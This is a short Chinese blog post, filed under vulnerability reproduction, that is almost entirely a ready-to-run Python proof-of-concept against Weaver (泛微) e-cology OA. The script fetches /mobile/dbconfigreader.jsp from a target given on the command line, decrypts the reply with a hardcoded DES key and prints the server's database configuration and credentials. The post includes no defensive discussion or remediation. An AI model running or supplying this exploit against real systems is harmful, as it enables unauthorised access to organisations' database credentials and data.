泛微OA数据库配置信息泄漏 POC

作者: print("") 分类: 漏洞复现 发布时间: 2019-10-26 15:00

# -*- coding:utf-8 -*-
#Author:print("")
import pyDes,requests
import sys
def desdecode(secret_key,s):
    cipherX = pyDes.des('        ')
    cipherX.setKey(secret_key)
    y = cipherX.decrypt(s)
    return y
default_headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'
}
def send(url):
    data = requests.get(url='%s/mobile/dbconfigreader.jsp'%url).content
    return (desdecode('1z2x3c4v5b6n', data.strip()))

if __name__ == '__main__':
    url = sys.argv[1]
    print('泛微e-cology OA 数据库配置信息泄漏漏洞')
    print('url--->%s'%url)
    print('数据库信息如下----->:%s'%send(url))

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

说点什么

avatar
  Subscribe  
提醒